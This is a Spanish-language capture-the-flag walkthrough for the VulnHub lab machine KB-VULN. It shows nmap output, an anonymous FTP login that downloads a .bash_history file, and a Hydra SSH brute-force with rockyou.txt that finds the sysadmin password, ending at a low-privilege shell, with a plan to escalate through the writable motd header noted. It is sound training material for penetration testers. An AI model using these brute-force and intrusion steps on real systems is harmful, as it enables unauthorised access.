Hoy vamos a hackear la maquina de Vulnhub llamada
KB-VULN. Podeis descargarla desde el siguiente enlace:
KB-VULN
Video
Enumeration
Empezamos con un nmap para ver que puertos
tiene abiertos.
~ > nmap -A -p- 192.168.1.91
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 10:52 CEST
Nmap scan report for 192.168.1.91
Host is up (0.00064s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.59
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol
2.0)
| ssh-hostkey:
| 2048 95:84:46:ae:47:21:d1:73:7d:2f:0a:66:87:98:af:d3 (RSA)
| 256 af:79:86:77:00:59:3e:ee:cf:6e:bb:bc:cb:ad:96:cc (ECDSA)
|_ 256 9d:4d:2a:a1:65:d4:f2:bd:5b:25:22:ec:bc:6f:66:97 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: OneSchool — Website by Colorlib
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.87 seconds
Vemos que tiene abiertos los puerto del FTP, SSH y HTTP.
En el codigo fuente de la pagina web inicial podemos
encontrar el siguiente comentario:
Username : sysadmin
Por otro lado, nos conectamos al ftp usando los credenciales
anonymous/anonymous.
~/KB > ftp 192.168.1.91
Connected to 192.168.1.91.
220 (vsFTPd 3.0.3)
Name (192.168.1.91:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x 2 1000 1000 4096 Aug 22 17:39 .
drwxrwxr-x 2 1000 1000 4096 Aug 22 17:39 ..
-rw-r--r-- 1 0 0 54 Aug 22 17:39 .bash_history
226 Directory send OK.
Vemos que hay un fichero .bash_history.
Lo descargamos.
ftp> get .bash_history
local: .bash_history remote: .bash_history
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .bash_history (54 bytes).
226 Transfer complete.
54 bytes received in 0.00 secs (73.3441 kB/s)
ftp>
Echamos un vistazo al contenido del fichero...
~/KB > cat .bash_history
exit
ls
cd /etc/update-motd.d/
ls
nano 00-header
exit
Vemos que "edita" el fichero 00-header.
Dicho fichero solo lo deberia poder editar root, ya que
se ejecuta cada vez que alguien se loguea al sistema.
Si conseguimos acceso al sistema, y podemos editar el fichero, podemos
utilizarlo para elevar nuestros privilegios.
Como no podemos ir por ningun otro lado, hacemos bruteforce por SSH al usuario
que hemos encontrado en el comentario de la web, sysadmin.
~ > hydra -l sysadmin -P /usr/share/wordlists/rockyou.txt 192.168.1.91 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret
service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-10
10:56:37
[WARNING] Many SSH configurations limit the number of parallel tasks, it is
recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip
waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries
(l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://192.168.1.91:22/
[22][ssh] host: 192.168.1.91 login: sysadmin password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-10
10:56:54
Encontramos la password :)
Nos logueamos!
Low Shell
~ > ssh sysadmin@192.168.1.91
sysadmin@192.168.1.91's password:
WELCOME TO THE KB-SERVER
Last login: Sat Aug 22 18:00:48 2020
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.
sysadmin@kb-server:~$